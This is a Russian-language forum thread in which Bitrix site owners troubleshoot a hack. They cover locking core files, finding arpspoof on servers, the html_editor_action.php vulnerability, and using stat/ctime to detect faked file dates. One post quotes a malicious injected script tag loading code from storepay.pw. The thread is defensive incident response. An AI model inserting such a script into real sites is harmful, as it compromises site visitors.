Я запретил папке prolog и файлу core.js редактирование, пока вирус не появлялся после этого. Следим за развитием ситуации...
08.11.2022 13:18:16
Я запретил папке prolog и файлу core.js редактирование, пока вирус не появлялся после этого. Следим за развитием ситуации...
|
|
|
|
10.11.2022 00:31:38
Я если честно пока ветку дочитал просто чуть со смеху не помер, есть хоть кто то кто осознал проблему BITRIX , хоть кто-то кто понимает что вся линейка BITRIX просто дыра возможно не умышленно сделали лазейки для себя а возможно по тупости и некомпетентности. Скачал свежую сборочку и проверил на несколько видов атак.. был удивлен и разочарован, дыры пришлось устранять самостоятельно, разочарую всех у кого не VPS ... ГОТОВЬТЕСЬ К ВЗЛОМУ ИЛИ ПРОСТО ИЩИТЕ НОВЫЙ ДВИЖОК...
|
|
|
|
10.11.2022 00:53:14
|
|||
|
|
10.11.2022 03:54:35
Алексей Чебанов, поясните этот момент
Какие именно виды атак на свежей сборки прошли? Какие дыры Вы залатали? |
|||
|
|
10.11.2022 21:24:33
Еще раз отвечу и думаю поставлю точку. Я не могу Вам тут описать метод взлома и уязвимости БИТРИКС это не законно, кому нужна свежая сборка скачивайте виртуальную машину и далее делайте стандартную установку предложенными в упаковке скриптами. Чтоб как то себя обезопасить делайте копию рабочего сайта каждые 12 часов. Я готов выложить компании Битрикс решения для ВПС серверов
|
|
|
|
11.11.2022 03:38:42
Алексей Чебанов, Вас оскорбляли?
Так и не понял, чем решение для vps будет отличаться от решения для шаред хостинга |
|
|
|
11.11.2022 20:27:50
Решениями он поделится, без тебя эксперта разберутся. Делать копию каждые 12 часов... а почему не 6? Вовремя обновляться надо и следовать лучшим практикам безопасности, вот и все. |
|||
|
|
14.11.2022 22:51:27
История получила продолжение
Проверяйте у себя /usr/sbin/arpspoof И если он есть, то вероятно ваша сеть (ессно помимо сервера) скомпроментированы |
|
|
|
14.11.2022 22:55:39
Это если кроны битры выполнялись от рута вероятно
Многие не учитывают почему-то этот момент |
|
|
|
15.11.2022 04:11:41
Зачем кому-то это делать? |
|||
|
|
15.11.2022 05:29:52
По сути изучают внутреннюю сеть для дальнейших атак Выяснили как раз за счёт спуфинга некоторых адресов наших клиентов У всех жертв общее это выделенный сервер с уязвимой битрой и кронами от рута |
|||
|
|
15.11.2022 14:49:49
Автоматизация Торговли (319758.ru)
|
|||
|
|
15.11.2022 15:28:02
Дак это ж всё - сразу "Привет" Скрипт будет выполняться от рута, со всеми вытекающими ... |
|||
|
|
16.11.2022 02:35:03
Автоматизация Торговли (319758.ru)
|
|||
|
|
16.11.2022 04:02:08
=)
|
|
|
|
16.11.2022 08:38:02
|
|||
|
|
28.11.2022 12:09:53
Обновление ядра не помогло ранее. |
|||||
|
|
28.11.2022 18:21:14
в prolog и core.js нет вредоносных строк, а код сайта встраивается <sc ript src='https://storepay.pw/jqueryui.js'></sc ript> Где может еще прятаться?
|
|
|
|
29.11.2022 15:50:37
судя по информации в статьях из предыдущего поста - с большой долей вероятности вас взломали через уязвимость html_editor_action.php - все симптомы взлом "на лицо" на сайте, где в данный момент занимаюсь этой проблемой обнаружил тоже самое "снос" данной папки Вам вообще ничего не даст - это следы взлома, нужно защищать html_editor_action.php либо обновляться |
|||
|
|
15.12.2022 10:45:02
|
|||
|
|
15.12.2022 10:48:14
|
|||
|
|
29.12.2022 13:40:38
Да, хотел бы прояснить одну ситуацию: дата изменения файла. Говорите, что файл main.php и прочие были модифицированы последний раз очень давно. Если бы не одно "но". Из PHP дата изменения файла меняется через команду touch(). Эта команда меняет время модификации файла, так называемый mtime. Но она не меняет время изменения статуса файла, т.е. время изменения свойств и метаданных файла, т.е. ctime. В консоли линукса нужно запустить команду stat имя_файла, т.е. например, чтобы посмотреть ctime для файла /bitrix/components/bitrix/main.file.input/main.php, вводим:
В итоге мы получим такую картину:
Это подтвердилось в ситуации, когда я проверял другой файл. 26.12.2022 года была сделана резервная копия сайта и развернута на компе, 27.12.2022 в проверяемом файле появились изменения, но дата изменения этого файла стояла вообще апрелем 2022. На компе же изменений в этом файле не оказалось. И только командой stat смог узнать, что на самом деле файл был изменен 27.12.2022. Так что те, у кого файл датирован то 2019 годом, то еще каким-то, проверьте строку "Change" через команду stat (если, конечно, сами этот файл не трогали). |
|||||||
|
|
09.01.2023 13:47:36
Александр Оносов, спасибо, коллега, что подробно разъяснил этот момент начинающим программистам - мне было лень это писать) Добавлю, что поиск изменённых файлов надо делать с помощью флага ctime, а не mtime:
Перед НГ преступники взломали один интернет-магазин, используя уязвимость bitrix/tools/html_editor_action.php. Пришлось разбираться с этим несколько часов. Если бы директория хранения временных файлов была вынесена за пределы сайта, то у преступника ничего не получилось бы.
Создание и поддержка сайтов:
|
|||
|
|
09.01.2023 13:51:08
почему Вы так решили? на сколько я понимаю там несколько другой механизм задействован - т.е. /upload/tmp/ это не = директория хранения временных файлов |
||||
|
|
|||